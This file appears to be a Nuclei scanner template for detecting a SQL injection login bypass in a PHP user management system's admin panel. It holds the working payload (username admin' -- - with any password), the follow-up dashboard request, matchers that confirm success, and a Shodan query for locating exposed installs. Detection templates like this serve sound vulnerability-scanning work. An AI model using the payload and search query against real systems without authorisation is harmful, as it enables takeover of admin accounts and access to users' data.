46 lines
1.5 KiB
YAML
46 lines
1.5 KiB
YAML
id: user-management-system-sqli
|
|
|
|
info:
|
|
name: User Management/Registration & Login v3.0 - SQL Injection
|
|
author: f0xy
|
|
severity: high
|
|
description: |
|
|
User Registration & Login and User Management System v3.0 admin panel has SQL vulnerability. Even though the person who discovered the vulnerability tested it in version 3.0, version 3.2 also contains the same vulnerability. It can be exploited by entering "admin' -- -" as the username parameter in the admin panel.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51695
|
|
- https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
shodan-query: title:"Registration and Login System"
|
|
tags: sqli,auth-bypass,user-management
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /admin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username=admin%27+--+-&password=whatever&login=
|
|
|
|
- |
|
|
GET /admin/dashboard.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Admin Dashboard"
|
|
- "Manage Users"
|
|
- "Signout"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100bc1d5effe5bde1f24beca0c441db912f123fe9b6c02ce9f7044820dbc894a41f0221009ebb0ae0179a9fab2d04d9e4f0b909283e868e4950fe9a3681a7e90ff6f202cc:922c64590222798bb761d5b6d8e72950 |